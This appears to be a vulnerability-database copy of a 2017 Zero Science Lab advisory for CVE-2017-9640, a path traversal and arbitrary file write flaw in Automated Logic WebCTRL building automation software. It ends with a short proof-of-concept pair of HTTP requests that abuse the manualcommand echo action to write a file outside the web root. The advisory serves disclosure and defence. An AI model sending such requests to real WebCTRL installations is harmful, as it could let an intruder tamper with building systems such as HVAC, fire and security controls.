Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormLiquidWormPACKETSTORM:143896
HistoryAug 23, 2017 - 12:00 a.m.

Automated Logic WebCTRL 6.1 Path Traversal Arbitrary File Write

2017-08-2300:00:00
LiquidWorm
packetstormsecurity.com
132

0.001 Low

EPSS

Percentile

48.9%

JSON
`  
Automated Logic WebCTRL 6.1 Path Traversal Arbitrary File Write  
  
  
Vendor: Automated Logic Corporation  
Product web page: http://www.automatedlogic.com  
Affected version: ALC WebCTRL, SiteScan Web 6.1 and prior  
ALC WebCTRL, i-Vu 6.0 and prior  
ALC WebCTRL, i-Vu, SiteScan Web 5.5 and prior  
ALC WebCTRL, i-Vu, SiteScan Web 5.2 and prior  
  
Summary: WebCTRLA(r), Automated Logic's web-based building automation  
system, is known for its intuitive user interface and powerful integration  
capabilities. It allows building operators to optimize and manage  
all of their building systems - including HVAC, lighting, fire, elevators,  
and security - all within a single HVAC controls platform. It's everything  
they need to keep occupants comfortable, manage energy conservation measures,  
identify key operational problems, and validate the results.  
  
Desc: The vulnerability is triggered by an authenticated user that can use  
the manualcommand console in the management panel of the affected application.  
The ManualCommand() function in ManualCommand.js allows users to perform additional  
diagnostics and settings overview by using pre-defined set of commands. This  
can be exploited by using the echo command to write and/or overwrite arbitrary  
files on the system including directory traversal throughout the system.  
  
Tested on: Microsoft Windows 7 Professional (6.1.7601 Service Pack 1 Build 7601)  
Apache-Coyote/1.1  
Apache Tomcat/7.0.42  
CJServer/1.1  
Java/1.7.0_25-b17  
Java HotSpot Server VM 23.25-b01  
Ant 1.7.0  
Axis 1.4  
Trove 2.0.2  
Xalan Java 2.4.1  
Xerces-J 2.6.1  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2017-5430  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5430.php  
  
CVE ID: CVE-2017-9640  
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9640  
  
  
30.01.2017  
  
--  
  
  
PoC:  
  
GET /_common/servlet/lvl5/manualcommand?wbs=251&action=echo%20peend>..\touch.txt&id=7331 HTTP/1.1  
Host: TARGET  
  
---  
  
GET http://TARGET/touch.txt HTTP/1.1  
  
peend  
`

Related

zdt 1
cve 1
nessus 3
prion 1
zeroscience 1
cvelist 1
nvd 1
exploitpack 1
exploitdb 1
ics 1
zdt
zdt
Automated Logic WebCTRL 6.1 Path Traversal Arbitrary File Write Vulnerability
2017-08-23 00:00:00
cve
cve
CVE-2017-9640
2017-08-25 19:29:00
nessus
nessus
Automated Logic Corporation WebCTRL, i-VU, SiteScan Improper Limitation of a Pathname to a Restricted Directory (Path Traversal) (CVE-2017-9640)
2023-04-06 00:00:00
Automated Logic Corporation WebCTRL, i-VU, SiteScan Improper Limitation of a Pathname to a Restricted Directory (CVE-2017-9640)
2023-04-06 00:00:00
Automated Logic Corporation WebCTRL, i-VU, SiteScan Improper Limitation of a Pathname to a Restricted Directory (Path Traversal) (CVE-2017-9640)
2023-04-06 00:00:00
prion
prion
Path traversal
2017-08-25 19:29:00
zeroscience
zeroscience
Automated Logic WebCTRL 6.1 Path Traversal Arbitrary File Write
2017-08-22 00:00:00
cvelist
cvelist
CVE-2017-9640
2017-08-25 19:00:00
nvd
nvd
CVE-2017-9640
2017-08-25 19:29:00
exploitpack
exploitpack
Automated Logic WebCTRL 6.1 - Path Traversal Arbitrary File Write
2017-08-22 00:00:00
exploitdb
exploitdb
Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write
2017-08-22 00:00:00
ics
ics
Automated Logic Corporation WebCTRL, i-VU, SiteScan
2017-08-22 12:00:00

0.001 Low

EPSS

Percentile

48.9%

JSON
Related for PACKETSTORM:143896
zdt1cve1nessus3prion1zeroscience1cvelist1nvd1exploitpack1exploitdb1ics1